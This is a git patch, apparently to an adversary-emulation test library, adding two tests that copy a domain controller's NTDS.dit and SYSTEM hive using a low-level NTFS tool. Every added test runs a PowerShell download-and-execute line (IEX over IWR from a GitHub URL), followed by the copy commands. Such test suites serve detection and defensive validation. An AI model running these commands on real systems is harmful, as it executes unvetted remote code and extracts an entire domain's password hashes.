From 02e4420bc07641714f38405687f9eab694466e3d Mon Sep 17 00:00:00 2001
From: kfallahi <46193761+kfallahi@users.noreply.github.com>
Date: Fri, 13 Feb 2026 06:14:07 +0330
Subject: [PATCH] Update T1003.003.md & T1003.003.yaml via UnderlayCopy (#3217)

---
 atomics/T1003.003/T1003.003.md   | 72 ++++++++++++++++++++++++++++++++
 atomics/T1003.003/T1003.003.yaml | 55 ++++++++++++++++++++++++
 2 files changed, 127 insertions(+)

diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index b45b8ae0..d73307cd 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -36,6 +36,10 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 
 - [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
 
+- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
+
+- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
+
 
 <br/>
 
@@ -461,8 +465,76 @@ mkdir c:\exfil
 diskshadow.exe /s #{filename}
 ```
 
+<br/>
 
 
+## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
+
+<br/>
+
+
+
+## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
 
 
 
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 50f69f6b..f085d179 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -261,3 +261,58 @@ atomic_tests:
       diskshadow.exe /s #{filename}
     name: command_prompt
     elevation_required: true
+- name: Copy NTDS in low level NTFS acquisition via MFT parsing
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+  supported_platforms:
+    - windows
+  input_arguments:
+    extract_path:
+      type: string
+      default: C:\Windows\Temp
+      description: Path for extracted NTDS.dit
+    script_url:
+      description: URL to UnderlayCopy script
+      type: url
+      default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR #{script_url} -UseBasicParsing)
+      Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+      Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+    name: powershell
+    elevation_required: true
+    cleanup_command: |
+      remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+      remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+
+- name: Copy NTDS in low level NTFS acquisition via fsutil
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+  supported_platforms:
+    - windows
+  input_arguments:
+    extract_path:
+      type: string
+      default: C:\Windows\Temp
+      description: Path for extracted NTDS.dit
+    script_url:
+      description: URL to UnderlayCopy script
+      type: url
+      default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR #{script_url} -UseBasicParsing)
+      Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+      Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+    name: powershell
+    elevation_required: true
+    cleanup_command: |
+      remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+      remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue